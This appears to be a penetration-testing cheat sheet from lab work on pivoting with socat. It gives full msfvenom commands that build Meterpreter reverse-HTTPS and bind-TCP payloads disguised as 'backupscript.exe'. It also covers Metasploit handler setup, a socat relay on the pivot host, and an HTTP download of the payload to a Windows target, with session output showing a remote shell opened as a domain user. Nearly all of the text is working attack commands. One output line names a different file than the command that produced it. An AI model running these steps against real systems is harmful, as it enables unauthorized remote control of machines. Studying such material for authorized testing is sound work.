Socat
Socat Redirection
Configure Socat on the Pivot Host
Listens on port 8080 and forwards traffic to the attack host for reverse shell connections.
C:\pivot_host> socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80
Create a Meterpreter Payload
Generates a Windows payload to connect to the pivot host’s internal IP and port.
C:\mrci0x1> msfvenom -p windows/x64/meterpreter/reverse_https LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=8080
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 743 bytes
Final size of exe file: 7168 bytes
Saved as: backupscript.exe
Configure the Metasploit Listener
Selects the multi-handler module to catch the reverse connection.
C:\mrci0x1> use exploit/multi/handler
Sets the payload type for the reverse HTTPS connection.
C:\mrci0x1> set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
Configures the listener to bind on all interfaces.
C:\mrci0x1> set lhost 0.0.0.0
lhost => 0.0.0.0
Sets the listener port to 80.
C:\mrci0x1> set lport 80
lport => 80
Starts the listener to wait for the reverse connection.
C:\mrci0x1> run
[*] Started HTTPS reverse handler on https://0.0.0.0:80
Transfer the Payload to the Windows Host
Copies the payload to the pivot host for distribution.
C:\mrci0x1> scp backupscript.exe ubuntu@10.129.202.64:~/
Hosts the payload on the pivot host using an HTTP server.
C:\pivot_host> python3 -m http.server 8123
Downloads the payload from the pivot host to the Windows target.
C:\windows> Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe"
Receive the Meterpreter Shell
Establishes a Meterpreter session upon payload execution.
[!] https://0.0.0.0:80 handling request from 10.129.202.64; (UUID: 8hwcvdrp) Without a database connected that payload UUID tracking will not work!
[*] https://0.0.0.0:80 handling request from 10.129.202.64; (UUID: 8hwcvdrp) Staging x64 payload (201308 bytes) ...
[!] https://0.0.0.0:80 handling request from 10.129.202.64; (UUID: 8hwcvdrp) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (10.10.14.18:80 -> 127.0.0.1 ) at 2022-03-07 11:08:10 -0500
meterpreter > getuid
Server username: INLANEFREIGHT\victor
Socat Bind Shell Redirection
Create a Bind Shell Payload
Generates a Windows bind shell payload to listen on port 8443.
C:\mrci0x1> msfvenom -p windows/x64/meterpreter/bind_tcp -f exe -o backupscript.exe LPORT=8443
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 499 bytes
Final size of exe file: 7168 bytes
Saved as: backupjob.exe
Transfer the Payload to the Windows Host
Copies the payload to the pivot host for distribution.
C:\mrci0x1> scp backupscript.exe ubuntu@10.129.202.64:~/
Hosts the payload on the pivot host using an HTTP server.
C:\pivot_host> python3 -m http.server 8123
Downloads the payload from the pivot host to the Windows target.
C:\windows> Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe"
Configure Socat on the Pivot Host
Listens on port 8080 and forwards traffic to the Windows target’s bind shell port.
C:\pivot_host> socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443
Configure the Metasploit Bind Handler
Selects the multi-handler module for the bind shell connection.
C:\mrci0x1> use exploit/multi/handler
Sets the payload type for the bind TCP connection.
C:\mrci0x1> set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
Sets the target host to the pivot host’s external IP.
C:\mrci0x1> set RHOST 10.129.202.64
RHOST => 10.129.202.64
Sets the port to match the Socat listener.
C:\mrci0x1> set LPORT 8080
LPORT => 8080
Starts the bind handler to connect to the Socat listener.
C:\mrci0x1> run
[*] Started bind TCP handler against 10.129.202.64:8080
Establish the Meterpreter Session
Establishes a Meterpreter session via the bind shell.
[*] Sending stage (200262 bytes) to 10.129.202.64
[*] Meterpreter session 1 opened (10.10.14.18:46253 -> 10.129.202.64:8080 ) at 2022-03-07 12:44:44 -0500
meterpreter > getuid
Server username: INLANEFREIGHT\victor
Last updated